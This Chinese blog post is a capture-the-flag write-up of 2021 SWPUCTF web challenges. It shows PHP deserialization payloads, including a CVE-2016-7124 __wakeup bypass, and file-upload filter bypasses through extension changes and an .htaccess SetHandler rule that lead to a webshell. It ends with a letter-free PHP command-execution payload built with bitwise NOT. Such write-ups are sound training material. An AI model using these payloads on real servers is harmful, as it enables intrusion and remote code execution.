首页 > 其他分享 >2021SWPUCTF-WEB(二)

2021SWPUCTF-WEB(二)

时间:2022-11-30 20:55:58浏览次数:53  
标签:WEB 2021SWPUCTF admin wllm passwd wakeup 上传 NSSCTF

ez_unserialize

image

不知道在哪,御剑扫叭

image

有一个robots.txt

image

image

一道反序列化好像是

分析代码应该是admin=admin、passwd=ctf即可输出flag

<?php
class wllm{
    public $admin;
    public $passwd;
    public function __construct(){
        $this->admin ="admin";
        $this->passwd ="ctf";
    }
}
$b = new wllm();
echo serialize($b);
?>

image

payload

O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

image

NSSCTF{7ea69acb-a2a2-486b-b80a-877bf9e1cd0b}

easyupload1.0

只能是上传jpg好像

image

猜测应该是后端检验,那那那就抓包改后缀

image

!!!!

image

上传成功了哈哈哈

image

成功了哈哈哈哈

找到了

image

WLLMCTF{I_d0nt_w4nna_wak3up}

好像不对woc,,,

然后再phpinfo里面找到了flag

image

NSSCTF{f3f118bf-7cb6-41ea-a0db-2d629d241a81}

easyupload2.0

同样的方式上传php发现报错了

image

改成phtml成功绕过

image

连上了hhhh

image

NSSCTF{2cd21bdd-bf16-4308-9ed4-3e225945c53e}

no_wakeup

题目中提示是CVE-2016-7124

image

多了个__wakeup,得想办法绕过这个wakeup才能满足if当中得条件

image

经过查阅应该是将属性值改的大于原属性值即可绕过wakeup

<?php
class HaHaHa{
    public $admin;
    public $passwd;
    public function __construct(){
        $this->admin ="admin";
        $this->passwd ="wllm";
    }
}
$b = new HaHaHa();
echo serialize($b);
?>

生成payload

O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

修改为

O:6:"HaHaHa":4:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

image

NSSCTF{8d7c4c70-4187-46c2-85bc-b84b35e5ec61}

easyupload3.0

没啥办法上传.htaccess来解析1.jpg为php就行了

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

同样上传webshell

可以

image

image

NSSCTF{ead0aa25-feab-4403-884b-931acb4d6226}

hardrce

image

明显是无字母rce

<?php
$system = 'system';
$command = 'ls';
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';

采用取反的方法

image

发现可以执行

直接读取flag

image

NSSCTF{a6d5a9b9-96b0-4d75-afac-85cedb42b80f}

标签:WEB,2021SWPUCTF,admin,wllm,passwd,wakeup,上传,NSSCTF
From: https://www.cnblogs.com/bpcat/p/16939703.html

相关文章

  • Web前端开发:前端简介与HTML协议
    目录前端一、前端与后端的概念1.前端的概念2.后端的概念3.了解前端的目的二、Web前端开发三大技术组成部分1.HTML超文本标记语言2.CSS是层叠样式表3.JavaScript网页脚本语......
  • 实验四 Web服务器2
    实验四Web服务器2基于华为鲲鹏云服务器CentOS中(或Ubuntu),使用LinuxSocket实现:Web服务器的客户端服务器,提交程序运行截图实现GET即可,请求,响应要符合HTTP协议规范服务......
  • Web服务器2
    编译查看ip地址访问服务器部署到华为云服务器,浏览器用本机的服务器部署访问......
  • Web服务器2
    Web服务器2基于华为鲲鹏云服务器CentOS中(或Ubuntu),使用LinuxSocket实现:Web服务器的客户端服务器,提交程序运行截图实现GET即可,请求,响应要符合HTTP协议规范服务器部署到......
  • web前端-03超链接和图片标签
    超链接1.超链接也是一个行内元素,在a标签中可以嵌套除它自身外的任何元素 2.属性:      href属性         指定跳转的目标路径  ......
  • springboot之web开发之webjars&静态资源映射规则
    一、使用springboot1、创建springboot应用,选中我们需要的模块2、springboot已经默认将这些场景配置好了,只需要在配置文件中指定少量配置就可以运行起来3、自己编写业务代码......
  • 2021SWPUCTF-WEB(一)
    gift_F12给了一个网站,题目提示是F12,就F12找一下​WLLMCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}jicao一个代码,逻辑很简单​大概就是通过POST的方式传一个参数id=w......
  • maven项目搭建web的war包,并配置到tomcat中
    1.新建项目,File→New→Project2.给项目添加一个Web模块3.在Web上,点击createartifact生成artifact4.给生成的artifact打包Artifacts:重要的一环,一个modu......
  • datax-web同步mysql数据中文乱码问题
    在同步数据的时候中文乱码首先看看俩数据库字符集是否相同是不是utf8如果确认没有问题之后打开刚才的任务在连接mysql的后面加上 ?useUnicode=true&characterEncoding=u......
  • Web服务器1-socket编程
    基于华为鲲鹏云服务器CentOS中(或Ubuntu),使用LinuxSocket实现:time服务器的客户端服务器,提交程序运行截图echo服务器的客户端服务器,提交程序运行截图,服务器把客户端传进来......